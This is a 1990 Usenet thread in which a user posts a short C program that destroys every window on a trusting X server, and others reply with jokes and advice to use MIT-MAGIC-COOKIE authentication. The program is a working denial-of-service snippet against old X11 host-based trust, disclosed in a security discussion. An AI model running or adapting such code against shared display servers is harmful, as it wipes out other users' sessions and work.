randy@uokmax.ecn.uoknor.edu (Longshot) (02/09/90)
This is a potential problem, and I'm sure I'm not the first to find it:
#include <X11/Xlib.h>
#include <X11/Xutil.h>
#include <stdio.h>
main(argc,argv)
int argc;
char **argv;
{
Display *mydisplay;
mydisplay = XOpenDisplay("");
if (!mydisplay) {
fprintf(stderr,"Could not open display.\n");
exit(1);
}
XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay));
XCloseDisplay(mydisplay);
}
Needless to say, if you are on a host that is trusted to an X server, this
small segment can wreck them. After this executes, ALL windows on the server
bound to DISPLAY die quickly and completely. I first had someone run this from
his X environment (an xterm running from twm), and then I ran it on an ascii
terminal connected to a host that was trusted to the X server. Obviously, if
a host is not permitted to a sever, this program will die, but here we run our
servers on Suns and Mac II's, and most of the applications on our Encore, which
is faster and can handle the load. The same Multimax averages 60-80 users
during peak hours, any of which who know X could do this. Doesn't X keep some
sort of identifier in a window structure or display structure that identifies
the owner? This is nasty!
Randy
--
Randy J. Ray University of Oklahoma, Norman Campus (405)/325-5370
!chinet!uokmax!randy randy@uokmax.uucp randy@uokmax.ecn.uoknor.edu
Flaming makes you feel better, sorta like popping the little plastic bubbles
in packaging material. -Tim Peralaargv%turnpike@Sun.COM (Dan Heller) (02/09/90)
In article <1990Feb8.211508.2581@uokmax.uucp> randy@uokmax.ecn.uoknor.edu (Longshot) writes: > This is a potential problem, and I'm sure I'm not the first to find it: > XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay)); > Needless to say, if you are on a host that is trusted to an X server, this > small segment can wreck them. > This is nasty! Patient: Doctor, it hurts when I do this. Doctor: Then don't do that. :-D dan ----------------------------------------------------------- O'Reilly && Associates argv@sun.com / argv@ora.com 632 Petaluma Ave, Sebastopol, CA 95472 800-338-NUTS, in CA: 800-533-NUTS, FAX 707-829-0104
stripes@eng.umd.edu (Joshua Osborne) (02/10/90)
In article <1990Feb8.211508.2581@uokmax.uucp> randy@uokmax.ecn.uoknor.edu (Longshot) writes: >This is a potential problem, and I'm sure I'm not the first to find it: You arn't, and this isn't the worse (be clever... read the man pages for xterm). [...] >Needless to say, if you are on a host that is trusted to an X server, this >small segment can wreck them. [...] Don't trust any hosts. Get X11R4 and use MIT-COOKIE-1 (you need to start X with the -auth option, and use xauth, or the Xau lib functions to make yourself a .Xauthority file). Then you only need to trust 2 people, you and root. -- stripes@wam.umd.edu "Security for Unix is like Josh_Osborne@Real_World,The Mutitasking for MS-DOS" "The dyslexic porgramer" - Kevin Lockwood Who needs friends when you can sit alone in your room and drink?